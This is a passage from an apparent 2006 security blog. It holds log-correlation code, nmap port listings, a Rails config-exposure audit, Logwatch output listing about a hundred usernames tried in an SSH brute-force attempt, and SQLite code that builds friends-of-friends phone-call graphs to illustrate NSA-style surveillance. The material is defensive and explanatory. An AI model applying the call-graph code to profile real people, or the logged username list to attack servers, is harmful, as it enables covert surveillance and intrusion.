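    '212.83.253.101 - - [19/Jun/2006:09:24:50 -0400] "GET /xmlrpc.php HTTP/1.0" 404 292 "-" "-"',
    '212.83.253.101 - - [19/Jun/2006:09:24:53 -0400] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 302 "-" "-"',
    '198.51.100.7 - - [19/Jun/2006:11:02:13 -0400] "GET /admin.php HTTP/1.0" 404 289 "-" "-"',
    '198.51.100.7 - - [19/Jun/2006:11:02:14 -0400] "TRACE / HTTP/1.0" 405 301 "-" "-"',
    '203.0.113.5 - - [19/Jun/2006:12:30:00 -0400] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
# Constructed router log: 212.83.253.101 also knocked on closed ports; 203.0.113.9 appears only here.
ROUTER_SAMPLE = [
    'Jun 19 08:58:01 router firewall: DENY tcp from 212.83.253.101:3312 to 192.0.2.10:22',
    'Jun 19 08:58:02 router firewall: DENY tcp from 212.83.253.101:3313 to 192.0.2.10:135',
    'Jun 19 10:15:44 router firewall: DENY udp from 203.0.113.9:1026 to 192.0.2.10:1434',
]


def apache_error_ips(lines: List[str], statuses=(404, 405)) -> Counter:
    """Source IPs behind 404/405 responses (the codes logwatch reports on), with a hit count each."""
    hits: Counter = Counter()
    for line in lines:
        m = APACHE_RE.match(line)
        if m and int(m.group('status')) in statuses:
            hits[m.group('ip')] += 1
    return hits


def router_deny_ips(lines: List[str]) -> Counter:
    """Source IPs the router firewall denied, with a hit count each."""
    hits: Counter = Counter()
    for line in lines:
        m = ROUTER_RE.search(line)
        if m:
            hits[m.group('ip')] += 1
    return hits


def probe_targets(lines: List[str]) -> Counter:
    """Which script each 404 asked for, ignoring the directory it was guessed under."""
    targets: Counter = Counter()
    for line in lines:
        m = APACHE_RE.match(line)
        if m and m.group('status') == '404':
            targets[m.group('path').rsplit('/', 1)[-1]] += 1
    return targets


def correlate(apache_lines: List[str], router_lines: List[str]) -> List[Dict]:
    """Inner join on source IP: addresses seen both probing the router and requesting missing web-app files."""
    web, fw = apache_error_ips(apache_lines), router_deny_ips(router_lines)
    return [{'ip': ip, 'web_errors': web[ip], 'router_denies': fw[ip]}
            for ip in sorted(web.keys() & fw.keys())]


if __name__ == '__main__':
    for row in correlate(APACHE_SAMPLE, ROUTER_SAMPLE):
        print(row)
    print(probe_targets(APACHE_SAMPLE).most_common())
```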

May 11, 2006

How the NSA Might use our Phone Records

Today, USA Today reported that the National Security Agency has been collecting domestic phone records of many of us U.S. citizens. Unlike everyone else blogging on this today, I'm taking no position on the ethicality of this activity. Instead, I'm going to tell you what I would do with those phone records from the perspective of a database geek. There's plenty of other analysis going on elsewhere, and I'm no constitutional lawyer.

I've been using Vonage for a while now, and I have access to my own phone records on the computer. It's easy enough to cut and paste my Vonage call records into Excel and from there into Access. From Access, I can easily export/import them into the Relational Database Management System of my choice, which for now is MS SQL 2005. However, there are many more out there.

Each record looks something like this: Date, Time (you can combine these into a LongDate), From phone number, To phone number, Duration, and a unique transaction ID. I get all this for incoming and outgoing calls. It's great for anyone that does billing for phone time. I'm assuming that these are the same kind of records that the NSA gets. Once the NSA gets these records, they do a data transform to make all the fields fit into their system in a uniform manner. Since the data is already fairly simple, they don't have to do much, and even a moderately skilled programmer like me could write something to transfer phone records almost as fast as they could get them.

If I had phone records from other people, I could combine them with my phone records into one massive table (relation, in database-speak). I could then do a reflexive query on them to pull a list of all the people I had contact with, through incoming or outgoing calls. I could then do another query to pull all contacts of all the people who had called me; this would show me my friends' friends. If I had access to more data about the phone numbers, say through geocoding (a fancy way of saying latitude and longitude attached to each phone number), I could create a map and track a phone tree. If I call someone in New York, and they call someone in Paris, and the person in Paris calls someone in Amman, I could draw lines making the connections on a map.

For this level of tracking to work, the NSA has to have absolutely all the phone records they can possibly get their hands on. If they have a target talking to someone and that someone talks to someone else and the NSA's records drop at the first friend of the target, they're lost. It would be a dead end. If they get all the records, the creation of a massive data warehouse that shows connections between people is pretty much academic. The budget for doing all this has dropped dramatically over recent years: you might be able to do it with a couple of Netezza data warehouse appliances. Rumor has it the NSA was Netezza's first customer. All the hardware to do it might cost under a million dollars. The tricky part, as with all data mining projects, is getting good data, and the NSA has that problem solved.

The hardest part left for them is scalability: they're trying to drink from a firehose, but the records aren't that big, which makes it feasible. You might be able to store all the number-only data in a record as short as 40 bytes: LongDate, Number, Number, Number, Number. (I'm not going to get into data types in depth here, but let's assume we can store phone numbers as numbers and not text to save space.) Thus one million phone records would occupy 40 megabytes. If the US makes a hundred million phone calls a day, that's about 4 GB a day of data. Large, but manageable if you have a large budget. Even if you double the key identifier size to 16 bytes (to cover hundreds of millions of calls) you're still only up to 4.8 GB per 100 million calls.
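The single calls relation, the reflexive query for contacts and friends of friends, and the hop-by-hop phone tree described above, worked through with an in-memory SQLite table. This is an added example, not the post's own code; the call records and phone numbers are constructed (555-01xx numbers are reserved for fiction) and follow the New York, Paris, Amman chain from the post.

```python
import sqlite3
from typing import List, Tuple

# Constructed call records in the shape the post describes: date+time, from, to, duration,
# with phone numbers stored as integers rather than text.
ME, NY, PARIS, AMMAN, OTHER = 13015550100, 12125550101, 33155550102, 96265550103, 14155550104
CALLS = [
    ('2006-05-01 09:10:00', ME, NY, 120),
    ('2006-05-01 09:40:00', NY, PARIS, 300),
    ('2006-05-01 10:05:00', PARIS, AMMAN, 45),
    ('2006-05-02 18:00:00', OTHER, ME, 600),
    ('2006-05-03 08:30:00', NY, ME, 90),
]


def load(records=CALLS) -> sqlite3.Connection:
    """Build the one massive calls relation in memory."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE calls (call_id INTEGER PRIMARY KEY, placed_at TEXT NOT NULL, '
                 'from_num INTEGER NOT NULL, to_num INTEGER NOT NULL, seconds INTEGER NOT NULL)')
    conn.executemany('INSERT INTO calls (placed_at, from_num, to_num, seconds) VALUES (?, ?, ?, ?)',
                     records)
    return conn


# Everyone a number spoke to, whether the call was incoming or outgoing.
HOP1 = '''SELECT DISTINCT CASE WHEN from_num = :n THEN to_num ELSE from_num END AS peer
          FROM calls WHERE from_num = :n OR to_num = :n'''


def contacts(conn: sqlite3.Connection, number: int) -> List[int]:
    return [r[0] for r in conn.execute(HOP1 + ' ORDER BY peer', {'n': number})]


def friends_of_friends(conn: sqlite3.Connection, number: int) -> List[int]:
    """The reflexive query: join a number's contacts back onto the same calls table for the second hop."""
    sql = f'''WITH hop1 AS ({HOP1})
              SELECT DISTINCT peer2 FROM (
                  SELECT CASE WHEN c.from_num = h.peer THEN c.to_num ELSE c.from_num END AS peer2
                  FROM hop1 h JOIN calls c ON c.from_num = h.peer OR c.to_num = h.peer)
              WHERE peer2 <> :n AND peer2 NOT IN (SELECT peer FROM hop1)
              ORDER BY peer2'''
    return [r[0] for r in conn.execute(sql, {'n': number})]


def phone_tree(conn: sqlite3.Connection, start: int, max_hops: int) -> List[Tuple[int, int, int]]:
    """Expand outward hop by hop; each edge (hop, caller side, new contact) is one line on the map."""
    seen, frontier, edges = {start}, [start], []
    for hop in range(1, max_hops + 1):
        next_frontier = []
        for n in frontier:
            for peer in contacts(conn, n):
                if peer not in seen:
                    seen.add(peer)
                    next_frontier.append(peer)
                    edges.append((hop, n, peer))
        frontier = next_frontier
    return edges


if __name__ == '__main__':
    db = load()
    print('contacts:', contacts(db, ME))
    print('friends of friends:', friends_of_friends(db, ME))
    for hop, a, b in phone_tree(db, ME, 3):
        print(f'hop {hop}: {a} -> {b}')
```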

Only after you've identified a target would you want to create a join query that connects names and addresses with phone numbers; this would be far more efficient than attaching names to the phone record tables, and would give the NSA a chance to say they're recording numbers only. If the NSA uses a consumer data company like, say, Acxiom, to get information on phone numbers post-targeting, then they're not even subject to the Freedom of Information Act or US Privacy Law.

The end result is that the NSA has the capability to map our social and business networks; given enough time and hardware, they could even plot them on satellite photos, creating a cool mish-mash of lines across neighborhoods. They could create files on us all like Friendster lists our friends and their connections. Whether the NSA's system actually works efficiently, we'll never know.

May 1, 2006

More Ruby on Rails Security

I do Windows, Unix (Solaris), and Linux (mostly Red Hat). Everyone who's into "open-source" keeps telling me how much more secure it is. I'm a CISSP and I've been installing open-source OSes since I had to know the chipset, IRQ and DMA of the NICs in my box to get networking to work. (The DEC Tulip was my favorite.) When I started working with Solaris 7 and Red Hat 4.x, telnet was enabled by default. I still wonder if telnet was enabled on a Trusted Solaris 7 default install. People who tell me any form of Unix is inherently more secure than any Windows don't seem to be familiar with the Morris worm, the Leshka Sendmail exploit, or BIND vulnerabilities. In fact, just mentioning BIND and sendmail in the same sentence is likely to send your security coordinator into the bunker for the rest of the day. Mind you, I've also seen IIS flaws. Can't we all just get along and implement security best practices on whatever platforms we're using?

Ruby on Rails shows a lot of promise for helping people get up and running on applications quickly. The tutorials are pretty helpful, but there are a couple of caveats:

In the configuration wizard, you can also just accept all of the defaults, except that in the security panel you must uncheck the "Modify Security Settings" checkbox (Figure 4). This is because starting with version 4.1.7, MySQL uses a new authentication algorithm that is not compatible with older client software, including the current version of Rails. By unchecking this box, you can access MySQL without a password.

This is not the path to secure computing. MySQL should NOT ship with a blank root password. Tutorials should not encourage the use of blank root passwords.

And they have you set up your server as to leave database.yml publicly available. I see Drupal attacks (xmlrpc.php) every day; it's only a matter of time before I start to see RoR attacks.

It's the developers' job to make it work. It's your job to make it work securely. Today's hackers don't even know C and have never heard of Kernighan and Ritchie; all they need is a script and an Internet connection to take advantage of your vulnerabilities.

April 28, 2006

Ruby on Rails and Security

Ruby on Rails is the most recently hyped language, so I thought about testing it out on my development server. I followed the tutorial available on the RoR website. It went fine until I ran a ./scripts/generate command and got a lot of syntax errors:

/usr/lib/ruby/1.8/yaml.rb:133:in `load': syntax error on line 27, col 2: `  host: localhost' (ArgumentError)
        from /usr/lib/ruby/gems/1.8/gems/rails-1.1.2/lib/initializer.rb:459:in `database_configuration'
        from /usr/lib/ruby/gems/1.8/gems/rails-1.1.2/lib/initializer.rb:181:in `initialize_database'
        from /usr/lib/ruby/gems/1.8/gems/rails-1.1.2/lib/initializer.rb:84:in `process'
        from /usr/lib/ruby/gems/1.8/gems/rails-1.1.2/lib/initializer.rb:42:in `run'
        from ../config/../config/environment.rb:13
        from /usr/lib/site_ruby/1.8/rubygems/custom_require.rb:21:in `require'
        from /usr/lib/ruby/gems/1.8/gems/activesupport-1.3.1/lib/active_support/dependencies.rb:147:in `require'
        from /usr/lib/ruby/gems/1.8/gems/rails-1.1.2/lib/commands/generate.rb:1
        from /usr/lib/site_ruby/1.8/rubygems/custom_require.rb:21:in `require'
        from /usr/lib/ruby/gems/1.8/gems/activesupport-1.3.1/lib/active_support/

I started looking around at the folder structure that Ruby installs itself into when you create a new RoR application. Below my main folder, for which the tutorial instructed me to create an alias or virtual directory, is the config folder. Inside the config folder is the database.yml file, holding my database information, with accounts and hard-coded passwords. (On my box, it's all localhost only, but still...)

Just to check, I fired up my browser and entered http://myserver/myrailsalias/config/database.yml. All the information popped up. I changed the Apache alias to /mypathtorails/public/ which I didn't see in the tutorial. This seems to be a lot more secure. This doesn't mean RoR is any more or less secure than any other interpreted scripting language for web applications, just that right now, it's easy to install it in a less secure manner.

What's the point? Know what you're installing, where it installs, what permissions it needs, and what context it runs as. And don't put your database.yml someplace where anyone can download it. I know there are websites where I could find it, but I'm not going to try. That doesn't mean someone else isn't writing a bot to find it right now.

Oh, and know how Apache works and httpd.conf works, too. All that is a lot to expect for people looking for a simple programming language.
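A way to check this for yourself, as an added example that is not code from the original post or from Rails: the script below builds a small Rails-style tree in a temporary directory (constructed sample data), then lists which sensitive files a static web server rooted at a given directory would hand out. Pointing the served root at the application folder, as the tutorial's alias does, exposes config/database.yml and the logs; pointing it at public/ exposes nothing. The list of sensitive names and suffixes is an assumption for the demonstration, not a Rails convention.

```python
"""Audit which sensitive files a web server would expose under a given document root.

Added example, not from the original post. The Rails-style tree is constructed
in a temporary directory to stand in for the author's application folder."""
from __future__ import annotations

import tempfile
from pathlib import Path

# Names and suffixes that should never be reachable over HTTP (assumed list)
SENSITIVE_NAMES = {"database.yml", ".htpasswd", "secrets.yml"}
SENSITIVE_SUFFIXES = {".yml", ".yaml", ".log", ".sqlite3"}


def is_sensitive(path: Path) -> bool:
    """True if a file's name or extension marks it as configuration, credentials or logs."""
    return path.name in SENSITIVE_NAMES or path.suffix in SENSITIVE_SUFFIXES


def exposed_sensitive_files(document_root: Path) -> list[str]:
    """URL paths (relative to the served directory) of sensitive files a static
    file server rooted at document_root would serve."""
    root = document_root.resolve()
    found = []
    for p in root.rglob("*"):
        if p.is_file() and is_sensitive(p):
            found.append("/" + p.relative_to(root).as_posix())
    return sorted(found)


def build_demo_rails_app(base: Path) -> Path:
    """Create a minimal Rails 1.x-style layout (constructed sample data, not a real app)."""
    app = base / "myrails"
    files = {
        "config/database.yml": "development:\n  adapter: mysql\n  username: root\n  password: s3cr3t\n",
        "config/environment.rb": "# environment settings\n",
        "log/development.log": "Processing ...\n",
        "public/index.html": "<html>hello</html>\n",
        "public/images/rails.png": "PNG",
    }
    for rel, body in files.items():
        f = app / rel
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_text(body)
    return app


def compare_roots() -> dict[str, list[str]]:
    """Alias pointed at the app root (the tutorial's layout) versus at public/."""
    with tempfile.TemporaryDirectory() as tmp:
        app = build_demo_rails_app(Path(tmp))
        return {
            "alias -> app root": exposed_sensitive_files(app),
            "alias -> public/": exposed_sensitive_files(app / "public"),
        }


if __name__ == "__main__":
    for label, files in compare_roots().items():
        print(f"{label}: {files or 'nothing sensitive reachable'}")
```

Run it against a real DocumentRoot by calling exposed_sensitive_files on that path; anything it lists is one GET away from whoever can reach the server.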

April 24, 2006

Quick nmap for different OSes in the lab

Just for fun, I thought I'd compare the ports open on the various boxes in my lab.

Mac OS X v. 10.3.9 (Running Dave)
PORT STATE SERVICE
21/tcp open ftp (Throws a Win98 .com filename "hole" in nessus)
22/tcp open ssh
139/tcp open netbios-ssn
427/tcp open svrloc
445/tcp open microsoft-ds
548/tcp open afpovertcp

Windows XP SP2 Laptop
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Fedora Core 4
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
443/tcp open https
1241/tcp open nessus
3306/tcp open mysql
10000/tcp open snet-sensor-mgmt (Actually webmin)

Windows Server 2003 DC
PORT STATE SERVICE
42/tcp open nameserver
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1025/tcp open NFS-or-IIS
1027/tcp open IIS
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-term-serv


April 22, 2006

Exchange 12: Open Ports

I was curious as to what Exchange 12 opened on my old Dell, so I ran a quick nmap scan. I also have SQL 2005 running, so that's open, too. As you can see from the list below, not all nmap service reports are accurate. Pretty short compared to my Fedora Core 4 box running Apache, MySQL, and Sendmail.

PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
1040/tcp open netsaint
1083/tcp open ansoft-lm-1
1155/tcp open nfa
1433/tcp open ms-sql-s
3389/tcp open ms-term-serv
5001/tcp open commplex-link
6001/tcp open X11:1
6002/tcp open X11:2
6004/tcp open X11:4
8009/tcp open ajp13

Two System Log Errors from the scan, One System Log Warning:
None, message: An anonymous session connected from 10.10.10.15 has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day. , Matched on: Type: Error , timestamp: 16:54:50 04/22/106

TermDD:50 on xxxx, category: None, message: The RDP protocol component X.224 detected an error in the protocol stream and has disconnected the client. , Matched on: Type: Error , timestamp:16:55:08 04/22/106

The Security System has received an authentication request that could not be decoded. The request has failed.

The Exchange roles running on this box include everything except gateway. (Client Access, Mail Store, Bridgehead).

For the full Nessus 3.0 report, read on.


March 28, 2006

The Bank is not your Friend, Part 2.

There is no "undo" button. When a fast-food cashier at Burger King accidentally entered $4,300 for a couple of hamburgers onto a debit card, the money was gone from the account for three days. Despite Burger King's immediate action to refund the money, Bank America sat on the money for three days.

This kind of mistake could happen anywhere, anytime, and the three days involved could cause a missed mortgage payment, a bank penalty fee, and a permanent black mark in a credit history, but there's still nothing the Bank will do about it. In fact, they made more money from the mistake in two ways: charging Burger King to process the refund, and the three days' interest on $4,300.

When you signed that debit card agreement, you gave all your rights away, and it can cost you real money. When it comes to online banking and debit transactions, the banks are watching their money, not yours.

The Bank is not your friend, part one.

Free Toll Payment for Foreign Diplomats

The recent un-diplomatic complaints from London’s Mayor concerning the U.S. Embassy in London’s refusal to pay taxes from which diplomats are exempt gave me an idea. The United States should exempt foreign diplomats in the United States from tolls. We should give them all free EZ Passes attached to their license plates. It would make them a lot easier to track. The State Department should probably start embedding an RFID tag in their tax-exempt cards, too.


Of course, they may already be embedding RFID tags in the license plates. The automated toll gates could easily be connected to a shadow tracking system. You could find out for yourself with an RFID reader, but you'd probably have more fun with an RFID reader/writer after you figure out who uses field-programmable RFID chips.

March 9, 2006

Following up before I leave for Spring Break

Since I detailed the script attacks on my Apache box looking for unpatched open-source software like phpmyadmin and Mambo, I get interesting search traffic from people looking for the hacking tools and scripts involved. They search for “pmafind” and “r3v3ng4ns,” and I think they’re actually looking to try and use the scripts rather than defend themselves.

I notified the netblock owner of every U.S.-based server I’ve identified trying to log onto my Linux box using SSH, and everybody I’ve notified said, yes, they had an issue and were taking the box offline. Some script-based attempts used over 1,000 usernames and passwords. Too bad the vast majority of them were overseas.

I have still had no luck in identifying the “mystery location” listed in my Google Maps tour. I was going to post pictures of it from the ground, but the signs surrounding the area prohibit that, so you won’t be seeing them here.

Declan Butler is doing cool things with tracking the Avian flu on Google Earth, and has another Google Earth/GIS story coming out soon.

I hope that when I return from Spring Break (undisclosed location), the world isn’t all 28 Days Later.

January 4, 2006

Cyber-Crime Up, Cyber-Crime-Fighting Down

Hackers have stolen hundreds of thousands of personal records over the past year, and many more thousands have been "lost or stolen." That's what happens when you fail to log backup tapes in your data center/server room/closet. Why not encrypt the backup tapes using the built-in software functions? There's a chance you might not be able to recover them as quickly. USA Today reported that the data of 55 million Americans have been exposed.


Last year could be the year that many more criminals discovered that hacking is profitable. Script kiddies and web site defacements are no longer a top threat. The people hacking into your network no longer want credit -- they want your money and records. And they will do their best to make sure you never know about the intrusion. Imagine the bullet list for a criminal mastermind PowerPoint presentation: hack into system, get data, erase logs, establish new credit, buy stuff.


Given the number of unemployed with education and the inability of law enforcement to track activity across borders quickly, international organized online crime will increase. Which do you fear more: a script kiddie going for web site defacement and shout-outs or a team of experienced, professional criminals targeting your data?


Our government will probably not be able to help. As cyber-crime grows increasingly sophisticated, the cyber-crime-fighting budget was cut. According to the USA Today story, cyber-crime now beats illegal drug sales in dollars, at $105 billion, although figures from the government on cyber-crime losses are generally exaggerated. Law enforcement can’t even do anything when someone steals your laptop and signs in to MSN Messenger as you.

Once again, you’re on your own to defend yourself and your data. The credit-reporting companies have responded by offering a pay-service to monitor your own data. And don’t leave your laptop unsecured anywhere ever. Those consumer-marketed biometric gadgets and USB keys may or may not protect your data, but the laptop is a commodity and even password-protected BIOSes can be rewritten.


What to do? Protect yourself and your data. No one is going to help you, except maybe an expensive computer security consulting firm.

December 21, 2005

The Bank is Not Your Friend

Digital signatures sound cool -- imagine being able to sign a check using a digital signature to guarantee the check's authenticity and irrevocability. Unfortunately, there's a little difference proposed by most banks when dealing with digital signatures. Irrevocable means that if anything gets signed with your digital signature, the burden of proof is on you the consumer to prove it wasn't you. Currently, when you sign a check, the burden of proof is on the bank. If it's not your signature, you don't pay. It won't be that way using a digital signature.

Banks may say they protect you from fraud, but they really protect themselves. If your identity gets stolen, the burden of proof is yours to prove it's not you that owes all that money. When ATMs were first introduced, banks argued they were infallible and anyone claiming losses from wrongful ATM withdrawals must be trying to defraud the bank of money. It lasted until the banks went after criminals who stole from the "infallible" ATMs.

As banks and consumers go further into online transactions in the digital age, be wary. The banks are placing more and more liabilities on the consumer. When you engage in online banking, the terms of service you click "yes" to agree to generally state that all bank records are definitive. If the bank says you withdrew it, you withdrew it and that's that.

A couple of years ago, I sent my online credit card payment to the cable company by mistake. I tried in vain to get a refund and settled for having a credit on my account that would cover a year of cable. At the end of that year, the fraud investigator decided that she couldn't find the money in the cable company's accounting system, and removed the credit from my account. After I found my bank statement from a year earlier, faxed it to her, and got my bank to call, we cleared things up, but the burden of proof was on me. And my bank wasn't that helpful, either, insisting that I find the bank statements from a year ago or pay for a copy from them.

What was shocking was that a year after crediting the money into my account, the cable company couldn't track its own cash, and assumed it must have been some fraud. The burden of proof was on me, and I really didn't enjoy tracking down a bank statement from the year before.

Do As I Say, Not As I Do?

It's easy to miss news buried back in the business section given what's going on in the front section, but this is pretty harsh. Guidance Software, which makes audit software, was itself hacked. Just about everyone who is anyone in the computer forensic investigation world uses this software. The hacker(s?) got names, card numbers, including the CVV codes on the back, which aren't even supposed to be stored, according to Visa and Mastercard guidelines. In case you're wondering, Visa and MC spell out exactly what measures merchants should take to protect this data, and it appears that Guidance violated several of them, resulting in a massive catch for the hackers.

You'd think you'd be safe, purchasing software with a credit card from a premier security software company. Following these guidelines is more important than ever, since hackers are no longer interested in mere website defacements. They're going after the money.


Visit a bank. Note the security measures. They don't leave money lying around. Even if they did, it wouldn't be legal to steal it, but you also wouldn't keep your money there.

December 10, 2005

A Couple of Schneier Entries Everyone Should Read

Security guru Bruce Schneier has a couple of recent news items on his blog that everyone should read. First off is the tale of backup tapes containing millions of banking records that were "lost." It turns out they weren't lost at all. The package control system was hacked to make the tape delivery a low-security item not requiring multiple signatures. After the package was stolen, hackers replaced the original security settings on the package. For companies that use paid off-site storage contractors, this is very scary.


Dr. Schneier's second entry is about a story in Nature, a scholarly scientific journal to which I subscribe and have used for writing reviews for my classes. Apparently, not everything in Nature is peer-reviewed, and a paper on a new type of encryption turned out to be almost complete bunk. Of course, you can't read the original piece in Nature without subscribing (I got the student rate), but Schneier has an excellent critique.

December 9, 2005

What They Do at Other IST Schools

OK, picking out hacking attempts from logfiles is getting tired, so I promise, just one more. Apparently, at other IST schools, attempting to log on to other people's servers is what they teach. I see the entries regularly in my emails from Logwatch. What makes this one different is that it comes from an IST school like mine.


This brings up the (tired old) subject of University networks. They need to remain open and useful to students and professors, but they need to be protected from abuse and being used to abuse others. Preventing attacks like these from a campus would be hard. You could block port 22 outbound, but that would cut off a lot of legitimate activity. You could have all students sign an acceptable use policy, which might help you enforce rules against someone when you catch them. You could monitor network traffic for patterns like these, but that would involve monitoring a lot of network traffic at great expense. Universities charge enough without having to purchase a lot of monitoring equipment and software and hiring staff to watch its students, but this is what the Federal government wants them to do. Given how many attacks originate at Universities, it's easy to understand why. The Morris worm nearly took down the Internet from a University almost twenty years ago.


The more things change...

Logwatch entries:


sshd:
    Authentication Failures:
       unknown (ist.pct.edu): 101 Time(s)
       apache (ist.pct.edu): 1 Time(s)
       bin (ist.pct.edu): 1 Time(s)
       mail (ist.pct.edu): 1 Time(s)
       mysql (ist.pct.edu): 1 Time(s)
       nobody (ist.pct.edu): 1 Time(s)
       root (ist.pct.edu): 1 Time(s)
       xfs (ist.pct.edu): 1 Time(s)
    Invalid Users:
       Unknown Account: 101 Time(s)

Failed logins from these:
    admin/password from ::ffff:72.20.218.49: 1 Time(s)
    adsl/password from ::ffff:72.20.218.49: 1 Time(s)
    akon/password from ::ffff:72.20.218.49: 1 Time(s)
    chun/password from ::ffff:72.20.218.49: 1 Time(s)
    cisco/password from ::ffff:72.20.218.49: 1 Time(s)
    cyd/password from ::ffff:72.20.218.49: 1 Time(s)
    deamon/password from ::ffff:72.20.218.49: 1 Time(s)
    dsl/password from ::ffff:72.20.218.49: 1 Time(s)
    favorites/password from ::ffff:72.20.218.49: 1 Time(s)
    fuji/password from ::ffff:72.20.218.49: 1 Time(s)
    fujiwara/password from ::ffff:72.20.218.49: 1 Time(s)
    fukumoto/password from ::ffff:72.20.218.49: 1 Time(s)
    genki/password from ::ffff:72.20.218.49: 1 Time(s)
    granlumie/password from ::ffff:72.20.218.49: 1 Time(s)
    guest/password from ::ffff:72.20.218.49: 1 Time(s)
    hagiwara/password from ::ffff:72.20.218.49: 1 Time(s)
    hakko/password from ::ffff:72.20.218.49: 1 Time(s)
    hayashi/password from ::ffff:72.20.218.49: 2 Time(s)
    hayashy/password from ::ffff:72.20.218.49: 1 Time(s)
    hiramara/password from ::ffff:72.20.218.49: 1 Time(s)
    hiramaru/password from ::ffff:72.20.218.49: 1 Time(s)
    hiroshi/password from ::ffff:72.20.218.49: 1 Time(s)
    history/password from ::ffff:72.20.218.49: 1 Time(s)
    hokko/password from ::ffff:72.20.218.49: 1 Time(s)
    hokoyama/password from ::ffff:72.20.218.49: 1 Time(s)
    horikoshi/password from ::ffff:72.20.218.49: 1 Time(s)
    hotline/password from ::ffff:72.20.218.49: 1 Time(s)
    hotmail/password from ::ffff:72.20.218.49: 1 Time(s)
    ikanri/password from ::ffff:72.20.218.49: 1 Time(s)
    info/password from ::ffff:72.20.218.49: 1 Time(s)
    install/password from ::ffff:72.20.218.49: 1 Time(s)
    internet/password from ::ffff:72.20.218.49: 1 Time(s)
    invite/password from ::ffff:72.20.218.49: 1 Time(s)
    iocha/password from ::ffff:72.20.218.49: 1 Time(s)
    ishihara/password from ::ffff:72.20.218.49: 1 Time(s)
    ito/password from ::ffff:72.20.218.49: 1 Time(s)
    kajipar/password from ::ffff:72.20.218.49: 1 Time(s)
    kakou/password from ::ffff:72.20.218.49: 1 Time(s)
    kamata/password from ::ffff:72.20.218.49: 1 Time(s)
    kamato/password from ::ffff:72.20.218.49: 1 Time(s)
    kato/password from ::ffff:72.20.218.49: 1 Time(s)
    kawakami/password from ::ffff:72.20.218.49: 1 Time(s)
    kay/password from ::ffff:72.20.218.49: 1 Time(s)
    ken/password from ::ffff:72.20.218.49: 1 Time(s)
    kenkou/password from ::ffff:72.20.218.49: 1 Time(s)
    kento/password from ::ffff:72.20.218.49: 1 Time(s)
    kobe/password from ::ffff:72.20.218.49: 1 Time(s)
    kohi/password from ::ffff:72.20.218.49: 1 Time(s)
    kohitujikai/password from ::ffff:72.20.218.49: 1 Time(s)
    kumemura/password from ::ffff:72.20.218.49: 1 Time(s)
    lestat/password from ::ffff:72.20.218.49: 1 Time(s)
    mac/password from ::ffff:72.20.218.49: 1 Time(s)
    masumura/password from ::ffff:72.20.218.49: 1 Time(s)
    matsuo/password from ::ffff:72.20.218.49: 1 Time(s)
    mikata/password from ::ffff:72.20.218.49: 1 Time(s)
    miura/password from ::ffff:72.20.218.49: 1 Time(s)
    motoka/password from ::ffff:72.20.218.49: 1 Time(s)
    motooka/password from ::ffff:72.20.218.49: 1 Time(s)
    nakamoto/password from ::ffff:72.20.218.49: 1 Time(s)
    nakamura/password from ::ffff:72.20.218.49: 1 Time(s)
    nakayama/password from ::ffff:72.20.218.49: 1 Time(s)
    new/password from ::ffff:72.20.218.49: 1 Time(s)
    nuke/password from ::ffff:72.20.218.49: 1 Time(s)
    otashiro/password from ::ffff:72.20.218.49: 1 Time(s)
    play/password from ::ffff:72.20.218.49: 1 Time(s)
    playboy/password from ::ffff:72.20.218.49: 1 Time(s)
    proba/password from ::ffff:72.20.218.49: 1 Time(s)
    prova/password from ::ffff:72.20.218.49: 1 Time(s)
    prueba/password from ::ffff:72.20.218.49: 1 Time(s)
    register/password from ::ffff:72.20.218.49: 1 Time(s)
    robert/password from ::ffff:72.20.218.49: 1 Time(s)
    roberto/password from ::ffff:72.20.218.49: 1 Time(s)
    ryu/password from ::ffff:72.20.218.49: 1 Time(s)
    saito/password from ::ffff:72.20.218.49: 1 Time(s)
    sales/password from ::ffff:72.20.218.49: 2 Time(s)
    search/password from ::ffff:72.20.218.49: 1 Time(s)
    sesso/password from ::ffff:72.20.218.49: 1 Time(s)
    sex/password from ::ffff:72.20.218.49: 1 Time(s)
    shimada/password from ::ffff:72.20.218.49: 1 Time(s)
    shiraki/password from ::ffff:72.20.218.49: 1 Time(s)
    shiraky/password from ::ffff:72.20.218.49: 1 Time(s)
    takato/password from ::ffff:72.20.218.49: 1 Time(s)
    teraji/password from ::ffff:72.20.218.49: 1 Time(s)
    test/password from ::ffff:72.20.218.49: 4 Time(s)
    toi/password from ::ffff:72.20.218.49: 1 Time(s)
    toy/password from ::ffff:72.20.218.49: 1 Time(s)
    transfer/password from ::ffff:72.20.218.49: 1 Time(s)
    trust/password from ::ffff:72.20.218.49: 1 Time(s)
    try/password from ::ffff:72.20.218.49: 1 Time(s)
    tujikai/password from ::ffff:72.20.218.49: 1 Time(s)
    wap/password from ::ffff:72.20.218.49: 1 Time(s)
    wara/password from ::ffff:72.20.218.49: 1 Time(s)
    web/password from ::ffff:72.20.218.49: 1 Time(s)
    www/password from ::ffff:72.20.218.49: 1 Time(s)
    yamanaka/password from ::ffff:72.20.218.49: 1 Time(s)
    yokoya/password from ::ffff:72.20.218.49: 1 Time(s)

